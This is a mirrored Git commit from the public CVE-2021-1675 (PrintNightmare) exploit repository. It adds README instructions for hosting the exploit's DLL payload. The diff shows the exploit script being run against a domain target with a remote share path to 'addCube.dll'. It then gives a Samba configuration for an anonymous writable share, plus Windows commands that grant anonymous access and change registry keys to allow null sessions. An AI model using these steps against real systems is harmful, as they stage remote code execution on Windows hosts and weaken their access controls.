mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-22 10:46:32 +00:00
added smb instructions
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
parent
86152766a0
commit
60f0785e58
1 changed files with 34 additions and 0 deletions
34
README.md
34
README.md
|
@ -47,3 +47,37 @@ Example;
|
|||
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
|
||||
```
|
||||
|
||||
### SMB configuration
|
||||
|
||||
Easiest way to host payloads is to use samba and modify `/etc/samba/smb.conf ` to allow anonymous access
|
||||
|
||||
```
|
||||
[global]
|
||||
map to guest = Bad User
|
||||
server role = standalone server
|
||||
usershare allow guests = yes
|
||||
idmap config * : backend = tdb
|
||||
smb ports = 445
|
||||
|
||||
[smb]
|
||||
comment = Samba
|
||||
path = /tmp/
|
||||
guest ok = yes
|
||||
read only = no
|
||||
browsable = yes
|
||||
force user = smbuser
|
||||
```
|
||||
|
||||
From windows it's also possible
|
||||
|
||||
```
|
||||
mkdir C:\share
|
||||
icacls C:\share\ /T /grant Anonymous` logon:r
|
||||
icacls C:\share\ /T /grant Everyone:r
|
||||
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
|
||||
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
|
||||
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
|
||||
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
|
||||
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue